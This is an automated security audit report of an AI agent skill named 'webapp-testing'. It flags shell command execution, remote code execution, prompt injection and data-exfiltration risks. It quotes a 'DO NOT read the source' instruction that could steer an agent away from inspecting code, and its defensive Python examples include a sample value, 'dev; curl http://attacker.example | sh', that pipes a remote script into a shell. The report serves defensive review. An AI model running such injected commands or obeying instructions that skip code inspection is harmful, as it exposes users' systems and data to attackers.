webapp-testing

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill provides a framework for executing arbitrary shell commands via the scripts/with_server.py helper. Specifically, the --server argument accepts strings that are likely executed via a shell (e.g., "npm run dev", "cd backend && python server.py"), enabling an attacker to run arbitrary commands if the user task is manipulated.
  • [REMOTE_CODE_EXECUTION] (HIGH): The skill instructs the agent to write and execute native Python Playwright scripts at runtime based on user-provided tasks. Executing generated code based on untrusted input is a classic RCE vector.
  • [PROMPT_INJECTION] (MEDIUM): The skill contains a deceptive instruction: "DO NOT read the source until you try running the script first". This is a 'black box' technique intended to bypass the agent's safety reasoning or inspection of executable code before runtime, effectively overriding standard safety protocols.
  • [DATA_EXFILTRATION] (LOW): Playwright scripts have the capability to read local files (via file:// protocols) and perform network requests. When coupled with the ability to generate scripts from untrusted user input, this creates a data exfiltration path.
  • [INDIRECT_PROMPT_INJECTION] (LOW): The skill has a significant attack surface because it ingests 'User tasks' and interpolates them into command-line arguments and script logic.
      • Ingestion points: User tasks (SKILL.md decision tree).
      • Boundary markers: Absent; the processed data is not wrapped in delimiters, and there is no instruction to ignore instructions embedded in it.
      • Capability inventory: Subprocess execution (via with_server.py), file system access, and network operations (via Playwright).
      • Sanitization: Absent; the skill does not suggest any validation or escaping of user input before it is used in executable contexts.
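The COMMAND_EXECUTION finding infers shell execution from the example --server values: "cd backend && python server.py" uses the `&&` operator and the `cd` builtin, which only work when the string is handed to a shell. The minimal Python sketch below illustrates that point and the kind of escaping the Sanitization item notes is absent. The helper names `needs_shell` and `quote_untrusted` are hypothetical and are not part of with_server.py.

```python
import shlex

# Characters that only carry special meaning when a string is passed to a shell
# (command chaining, pipes, redirection, subshells, substitution).
SHELL_METACHARACTERS = set(";&|<>()$`\n")


def needs_shell(command: str) -> bool:
    """Return True if `command` contains shell syntax that would only be
    interpreted when run via a shell. Builtins such as `cd` are not detected."""
    return any(ch in SHELL_METACHARACTERS for ch in command)


def quote_untrusted(value: str) -> str:
    """Escape an untrusted value so a POSIX shell treats it as one literal word."""
    return shlex.quote(value)


if __name__ == "__main__":
    print(needs_shell("npm run dev"))                     # False
    print(needs_shell("cd backend && python server.py"))  # True
    task = "dev; curl http://attacker.example | sh"
    print(quote_untrusted(task))  # 'dev; curl http://attacker.example | sh'
```

Quoting only helps where the harness assembles the command itself; a --server string supplied whole by a manipulated task would still run as written if it reaches a shell.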
Recommendations
  • AI detected serious security threats
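For the DATA_EXFILTRATION finding, one way to narrow the file:// and outbound-network path is to validate each URL before a generated Playwright script navigates to it. This is a minimal sketch under an assumed policy that only a local dev server on localhost or 127.0.0.1 may be visited; the allowlists and `is_allowed_url` are hypothetical and not taken from the skill.

```python
from urllib.parse import urlsplit

# Hypothetical policy: generated scripts may only visit a local dev server.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}


def is_allowed_url(url: str) -> bool:
    """Reject file:// URLs and any host outside the allowlist.

    urlsplit lowercases the scheme and .hostname lowercases the host,
    so "HTTP://LOCALHOST:3000" is treated the same as "http://localhost:3000".
    """
    parts = urlsplit(url)
    return parts.scheme in ALLOWED_SCHEMES and parts.hostname in ALLOWED_HOSTS


if __name__ == "__main__":
    for candidate in (
        "http://localhost:5173/",
        "file:///etc/passwd",
        "https://attacker.example/upload",
    ):
        print(candidate, is_allowed_url(candidate))
```

In a generated script the check would run before each `page.goto(...)` call; on its own it does not block requests that the loaded page issues itself.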
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 06:17 PM